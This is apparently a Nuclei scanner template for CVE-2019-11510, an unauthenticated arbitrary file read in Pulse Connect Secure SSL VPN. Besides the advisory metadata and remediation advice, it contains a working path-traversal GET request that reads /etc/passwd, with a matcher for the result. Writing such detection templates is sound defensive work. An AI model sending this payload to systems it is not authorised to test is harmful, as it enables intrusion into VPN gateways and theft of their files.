id: CVE-2019-11510 info: name: Pulse Connect Secure SSL VPN Arbitrary File Read author: organiccrap severity: critical description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access. remediation: | Apply the latest security patches and updates provided by Pulse Secure. reference: - https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html - https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/ - https://nvd.nist.gov/vuln/detail/CVE-2019-11510 - http://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html - http://packetstormsecurity.com/files/154231/Pulse-Secure-SSL-VPN-File-Disclosure-NSE.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2019-11510 cwe-id: CWE-22 epss-score: 0.97278 epss-percentile: 0.99808 cpe: cpe:2.3:a:pulsesecure:pulse_connect_secure:8.2:r1.0:*:*:*:*:*:* metadata: max-request: 1 vendor: pulsesecure product: pulse_connect_secure tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev http: - method: GET path: - "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100918b21af4cafed07e9bf815171e4fe9ea10f26c6e25cd32f3005579eb004a7da02206bbd8bf4c73ced5cade0bafb528f2eff70e2245df45f6b4b5144f9ae0250df26:922c64590222798bb761d5b6d8e72950